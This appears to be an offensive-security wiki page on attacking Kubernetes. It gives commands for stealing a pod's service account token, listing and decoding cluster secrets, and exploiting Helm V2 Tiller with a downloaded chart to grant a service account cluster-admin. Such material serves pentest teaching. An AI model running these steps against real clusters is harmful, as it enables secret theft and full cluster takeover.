Kubernetes

Container orchestration for managing large, scalable infrastructures of containerized applications.

Attacking a Kubernetes cluster is similar to attacking Windows Active Directory:

  1. Find a vulnerability in an application (RCE, SSRF, SSH, etc.)

  2. Perform Lateral Movement to access more pods and nodes with higher privileges

  3. Reach the Highest Privileges to do anything an attacker wants

Initial Access

The /var/run/secrets/kubernetes.io/serviceaccount/token file (sometimes /run instead of /var/run) on a Kubernetes pod contains a Service Account Token in the form of a JSON Web Token. It can be decoded, and the payload tells you exactly who or what the account belongs to.
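The decoding itself is a one-liner, since the claims are just base64-encoded JSON. A minimal sketch (the token below is fabricated for illustration; on a real pod, read it from the mounted file instead):

```shell
# On a real pod: TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Fabricated token here, so the decoding step itself can be demonstrated
CLAIMS='{"iss":"kubernetes/serviceaccount","sub":"system:serviceaccount:default:default"}'
TOKEN="$(printf '{"alg":"RS256"}' | base64 -w0).$(printf '%s' "$CLAIMS" | base64 -w0).sig"

# A JWT is header.payload.signature; the payload (field 2) holds the identity
echo "$TOKEN" | cut -d '.' -f2 | base64 -d
```

Note that real tokens are base64url-encoded without padding, so you may need to translate `-_` to `/+` and append `=` padding before `base64 -d` accepts the payload.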

This token can be used for Lateral Movement through the rest of the cluster by interacting with the API server, and because the pod sits on the internal network, many more servers become reachable. A few useful endpoints are:

  • /api/v1/namespaces/default/pods/: List all pods

  • /api/v1/namespaces/default/secrets/: List all secrets

These can be requested with the found Service Account Token (JWT) as a header:

curl -k -v -H 'Authorization: Bearer <TOKEN>' https://<API_SERVER>/...
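Inside a pod, everything needed for these requests is discoverable locally: the same serviceaccount directory also mounts the cluster CA certificate and the pod's namespace, and the API server address is exposed through standard environment variables. A hedged sketch (the guard makes it a no-op when run outside a cluster):

```shell
# Standard in-cluster paths and env vars; does nothing outside a pod
SA_DIR=/var/run/secrets/kubernetes.io/serviceaccount
if [ -f "$SA_DIR/token" ]; then
    APISERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
    TOKEN=$(cat "$SA_DIR/token")
    NS=$(cat "$SA_DIR/namespace")
    # List secrets in the pod's own namespace, trusting the mounted CA
    curl --cacert "$SA_DIR/ca.crt" \
         -H "Authorization: Bearer $TOKEN" \
         "$APISERVER/api/v1/namespaces/$NS/secrets/"
fi
```

Using the mounted `ca.crt` avoids the `-k`/`--insecure-skip-tls-verify` flags entirely, since the API server's certificate chains to that CA.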

If the machine has kubectl installed (or you download a static binary), it is also possible to simply use it instead of manual curl commands. Some similar and useful commands are:

# List everything
$ kubectl get all --token $TOKEN --server $API_SERVER --insecure-skip-tls-verify
$ kubectl get pods     # List pods (same --token/--server flags apply)
$ kubectl get secrets  # List secrets

# Execute an interactive shell in a pod
$ kubectl exec <POD_NAME> --stdin --tty -- /bin/bash
# Get and decode a secret
$ kubectl get secret <SECRET_NAME> -o jsonpath='{.data.*}' | base64 -d
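Before trying endpoints blindly, it can help to ask the API server what the stolen token is actually allowed to do. `kubectl auth can-i` queries RBAC directly (same flags as above; the `command -v` guard simply skips the call where kubectl is unavailable):

```shell
# Enumerate every verb/resource pair this token is permitted to use
command -v kubectl >/dev/null && kubectl auth can-i --list \
    --token "$TOKEN" --server "$API_SERVER" --insecure-skip-tls-verify
```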

Helm V2 - Tiller

At the time of writing, Helm V3 is the newest version, but many clusters still run the outdated V2. This has serious security implications: the Tiller component holds full cluster-admin RBAC privileges, which can be exploited if we can reach it.

You can test the TCP connection to Tiller on port 44134 and verify the version:

$ nc -v tiller-deploy.kube-system 44134
Connection to tiller-deploy.kube-system 44134 port [tcp/*] succeeded!
$ helm --host tiller-deploy.kube-system:44134 version
Client: &version.Version{SemVer:"v2.0.0", GitCommit:"ff52399e51bb880526e9cd0ed8386f6433b74da1", GitTreeState:"clean"}
Server: &version.Version{SemVer:"v2.0.0", GitCommit:"b0c113dfb9f612a9add796549da66c0d294508a3", GitTreeState:"clean"}

To start exploiting this, a ready-to-use template exists that requires some minimal changes:

$ curl -L -o ./pwnchart.tgz https://github.com/Ruil1n/helm-tiller-pwn/raw/main/pwnchart-0.1.0.tgz
$ tar xvf ./pwnchart.tgz

Inside the newly created ./pwnchart folder, the clusterrole.yaml and clusterrolebinding.yaml files in the templates/ folder require the following change:

templates/*.yaml
- apiVersion: rbac.authorization.k8s.io/v1beta1
+ apiVersion: rbac.authorization.k8s.io/v1

In the values.yml file, the name: key needs to be changed to the service account that will gain all privileges. Make sure this is a service account you control:

- name: default
+ name: compromised-user
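For context, the chart's templates render to something roughly like the following ClusterRoleBinding, binding the chosen service account to the built-in cluster-admin role (illustrative sketch; the metadata name and exact layout in pwnchart may differ):

```yaml
# Illustrative rendering of the chart's clusterrolebinding template
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: pwn-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: compromised-user
    namespace: default
```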

Finally, after setting this up, install the chart against the Tiller service:

$ helm --host tiller-deploy.kube-system:44134 install --name pwnchart ./pwnchart

After doing so, the compromised-user token holds every permission on the cluster and can access anything. Run kubectl get all with it to list everything.
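To confirm the escalation worked, a wildcard RBAC check with the compromised account's token should now succeed (flags as before; guarded so it is a no-op without kubectl):

```shell
# After the install, '*' on '*' should return "yes" for the bound account
command -v kubectl >/dev/null && kubectl auth can-i '*' '*' \
    --token "$TOKEN" --server "$API_SERVER" --insecure-skip-tls-verify
```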
